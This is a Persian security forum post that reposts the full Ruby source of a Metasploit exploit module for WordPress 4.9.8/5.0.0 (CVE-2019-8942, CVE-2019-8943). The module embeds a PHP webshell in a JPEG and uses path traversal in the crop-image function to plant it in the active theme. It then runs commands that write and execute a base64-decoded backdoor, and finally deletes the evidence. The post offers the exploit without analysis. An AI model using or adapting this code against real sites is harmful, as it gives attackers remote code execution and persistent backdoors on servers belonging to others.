رفتن به مطلب
انجمن تیم امنیتی گارد ایران
mdonline

WordPress Crop-image Shell Upload

پست های پیشنهاد شده

https://packetstormsecurity.com/files/152396/wp_crop_rce.rb.txt
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::FileDropper
 include Msf::Exploit::Remote::HTTP::Wordpress

 def initialize(info = {})
  super(update_info(
   info,
   'Name'      => 'WordPress Crop-image Shell Upload',
   'Description'   => %q{
     This module exploits a path traversal and a local file inclusion
     vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
     The crop-image function allows a user, with at least author privileges,
     to resize an image and perform a path traversal by changing the _wp_attached_file
     reference during the upload. The second part of the exploit will include
     this image in the current theme by changing the _wp_page_template attribute
     when creating a post.

     This exploit module only works for Unix-based systems currently.
   },
   'License'     => MSF_LICENSE,
   'Author'     =>
   [
    'RIPSTECH Technology',                # Discovery
    'Wilfried Becard <wilfried.becard@synacktiv.com>'  # Metasploit module
   ],
  'References'   =>
   [
    [ 'CVE', '2019-8942' ],
    [ 'CVE', '2019-8943' ],
    [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
   ],
   'DisclosureDate' => 'Feb 19 2019',
   'Platform'    => 'php',
   'Arch'      => ARCH_PHP,
   'Targets'     => [['WordPress', {}]],
   'DefaultTarget'  => 0
  ))

  register_options(
   [
    OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
    OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
   ])
 end

 def check
  cookie = wordpress_login(username, password)
  if cookie.nil?
   store_valid_credential(user: username, private: password, proof: cookie)
   return CheckCode::Safe
  end

  CheckCode::Appears
 end

 def username
  datastore['USERNAME']
 end

 def password
  datastore['PASSWORD']
 end

 def get_wpnonce(cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
  res = send_request_cgi(
   'method'  => 'GET',
   'uri'    => uri,
   'cookie' => cookie
  )
  if res && res.code == 200 && res.body && !res.body.empty?
   res.get_hidden_inputs.first["_wpnonce"]
  end
 end

 def get_wpnonce2(image_id, cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
  res = send_request_cgi(
   'method'  => 'GET',
   'uri'    => uri,
   'cookie'  => cookie,
   'vars_get' => {
    'post'  => image_id,
    'action' => "edit"
   }
  )
  if res && res.code == 200 && res.body && !res.body.empty?
   tmp = res.get_hidden_inputs
   wpnonce2 = tmp[1].first[1]
  end
 end

 def get_current_theme
  uri = normalize_uri(datastore['TARGETURI'])
  res = send_request_cgi!(
   'method'  => 'GET',
   'uri'    => uri
  )
  fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?

  theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
  fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme

  theme
 end

 def get_ajaxnonce(cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
  res = send_request_cgi(
   'method'  => 'POST',
   'uri'    => uri,
   'cookie' => cookie,
   'vars_post' => {
    'action' => 'query-attachments',
    'post_id' => '0',
    'query[item]' => '43',
    'query[orderby]' => 'date',
    'query[order]' => 'DESC',
    'query[posts_per_page]' => '40',
    'query[paged]' => '1'
   }
  )
  fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?
  a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
  fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce

  a_nonce
 end

 def upload_file(img_name, wp_nonce, cookie)
  img_data = %w[
   FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F
   74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00
   10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00
   3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69
   6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D
   20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09
   08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D
   27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06
   09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
   24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
   24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF
   C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06
   07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01
   02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1
   15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38
   39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73
   74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4
   A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4
   D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF
   C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06
   07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00
   01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09
   23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37
   38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A
   73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2
   A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2
   D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF
   DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B
   3F 3E
  ]
  img_data = [img_data.join].pack('H*')
  img_name += '.jpg'

  boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
  post_data = "--#{boundary}\r\n"
  post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
  post_data << "\r\n#{img_name}\r\n"
  post_data << "--#{boundary}\r\n"
  post_data << "Content-Disposition: form-data; name=\"action\"\r\n"
  post_data << "\r\nupload-attachment\r\n"
  post_data << "--#{boundary}\r\n"
  post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n"
  post_data << "\r\n#{wp_nonce}\r\n"
  post_data << "--#{boundary}\r\n"
  post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n"
  post_data << "Content-Type: image/jpeg\r\n"
  post_data << "\r\n#{img_data}\r\n"
  post_data << "--#{boundary}--\r\n"
  print_status("Uploading payload")
  upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')

  res = send_request_cgi(
   'method'  => 'POST',
   'uri'   => upload_uri,
   'ctype'  => "multipart/form-data; boundary=#{boundary}",
   'data'   => post_data,
   'cookie'  => cookie
  )
  fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
  print_good("Image uploaded")
  res = JSON.parse(res.body)
  image_id = res["data"]["id"]
  update_nonce = res["data"]["nonces"]["update"]
  filename = res["data"]["filename"]
  return filename, image_id, update_nonce
 end

 def image_editor(img_name, ajax_nonce, image_id, cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
  res = send_request_cgi(
   'method'  => 'POST',
   'uri'    => uri,
   'cookie' => cookie,
   'vars_post' => {
    'action' => 'image-editor',
    '_ajax_nonce' => ajax_nonce,
    'postid' => image_id,
    'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
    'target' => 'all',
    'context' => '',
    'do' => 'save'
   }
  )
  fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?
  filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
  fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename

  filename << '.jpg'
 end

 def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
  res = send_request_cgi(
   'method'  => 'POST',
   'uri'   => uri,
   'cookie' => cookie,
   'vars_post' => {
    '_wpnonce' => wpnonce2,
    'action' => 'editpost',
    'post_ID' => image_id,
    'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
   }
  )
 end

 def crop_image(image_id, ajax_nonce, cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
  res = send_request_cgi(
   'method'  => 'POST',
   'uri'   => uri,
   'cookie' => cookie,
   'vars_post' => {
    'action' => 'crop-image',
    '_ajax_nonce' => ajax_nonce,
    'id' => image_id,
    'cropDetails[x1]' => 0,
    'cropDetails[y1]' => 0,
    'cropDetails[width]' => 400,
    'cropDetails[height]' => 300,
    'cropDetails[dst_width]' => 400,
    'cropDetails[dst_height]' => 300
   }
  )
 end

 def include_theme(shell_name, cookie)
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
  res = send_request_cgi(
   'method'  => 'POST',
   'uri'   => uri,
   'cookie' => cookie
  )
  if res && res.code == 200 && res.body && !res.body.empty?
   wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
   post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
   fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id

   post_title = Rex::Text.rand_text_alpha(10)
   uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
   res = send_request_cgi(
    'method'  => 'POST',
    'uri'   => uri,
    'cookie' => cookie,
    'vars_post' => {
     '_wpnonce'=> wpnonce2,
     'action' => 'editpost',
     'post_ID' => post_id,
     'post_title' => post_title,
     'post_name' => post_title,
     'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
    }
   )
   fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302
   post_id
  end
 end

 def check_for_base64(cookie, post_id)
  uri = normalize_uri(datastore['TARGETURI'])
  # Test if base64 is on target
  test_string = 'YmFzZTY0c3BvdHRlZAo='
  res = send_request_cgi!(
   'method'  => 'GET',
   'uri'   => uri,
   'cookie' => cookie,
   'vars_get' => {
    'p' => post_id,
    '0' => "echo #{test_string} | base64 -d"
   }
  )
  fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?

  fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted")
  # Execute payload with base64 decode
  @backdoor = Rex::Text.rand_text_alpha(10)
  encoded = Rex::Text.encode_base64(payload.encoded)
  res = send_request_cgi!(
   'method'  => 'GET',
   'uri'   => uri,
   'cookie' => cookie,
   'vars_get' => {
    'p' => post_id,
    '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
   }
  )

  fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?
  send_request_cgi(
   'method' => 'GET',
   'uri'   => normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
   'cookie' => cookie
  )
 end

 def wp_cleanup(shell_name, post_id, cookie)
  print_status('Attempting to clean up files...')
  uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
  res = send_request_cgi(
   'method'  => 'POST',
   'uri'    => uri,
   'cookie'  => cookie,
   'vars_post' => { 'action' => "query-attachments" }
  )

  fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?
  infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
  id1, id2, id3 = infos[0], infos[2], infos[4]
  delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
  for i in (0...6).step(2)
   res = send_request_cgi(
    'method'  => 'POST',
    'uri'    => uri,
    'cookie'  => cookie,
    'vars_post' => {
      'action' => "delete-post",
      'id'   => infos[i],
      '_wpnonce' => infos[i+1]
    }
   )
  end

  uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
  res = send_request_cgi(
   'method'  => 'GET',
   'uri'    => uri1,
   'cookie'  => cookie
  )

  if res && res.code == 200 && res.body && !res.body.empty?
   post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first
   fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
   uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')

   res = send_request_cgi(
    'method'  => 'GET',
    'uri'    => uri2,
    'cookie'  => cookie,
    'vars_get' => {
     'post'   => post_id,
     'action'  => 'trash',
     '_wpnonce' => post_nonce
    }
   )

   fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302
   res = send_request_cgi(
    'method'  => 'GET',
    'uri'    => uri1,
    'cookie'  => cookie,
    'vars_get' => {
     'post_status' => "trash",
     'post_type'  => 'post',
     '_wpnonce' => post_nonce
    }
   )

   if res && res.code == 200 && res.body && !res.body.empty?
    nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first
    fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce

    send_request_cgi(
     'method'  => 'GET',
     'uri'    => uri2,
     'cookie'  => cookie,
     'vars_get' => {
      'post'   => post_id,
      'action'  => 'delete',
      '_wpnonce' => nonce
     }
    )
   end
  end
 end

 def exploit
  fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

  print_status("Authenticating with WordPress using #{username}:#{password}...")
  cookie = wordpress_login(username, password)
  fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
  print_good("Authenticated with WordPress")
  store_valid_credential(user: username, private: password, proof: cookie)

  print_status("Preparing payload...")
  @current_theme = get_current_theme
  wp_nonce = get_wpnonce(cookie)
  @current_date = Time.now.strftime("%Y/%m/")

  img_name = Rex::Text.rand_text_alpha(10)
  @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)
  ajax_nonce = get_ajaxnonce(cookie)

  @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
  wpnonce2 = get_wpnonce2(image_id, cookie)

  change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
  crop_image(image_id, ajax_nonce, cookie)

  @shell_name = Rex::Text.rand_text_alpha(10)
  change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
  crop_image(image_id, ajax_nonce, cookie)

  print_status("Including into theme")
  post_id = include_theme(@shell_name, cookie)

  check_for_base64(cookie, post_id)
  wp_cleanup(@shell_name, post_id, cookie)
 end

 def on_new_session(client)
  client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
  client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*")
  client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
  client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
  client.shell_command_token("rm #{@backdoor}.php")
 end
end

 

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از ۷۵ اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به عنوان یک لینک به جای

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

در حال بارگذاری

×
×
 • جدید...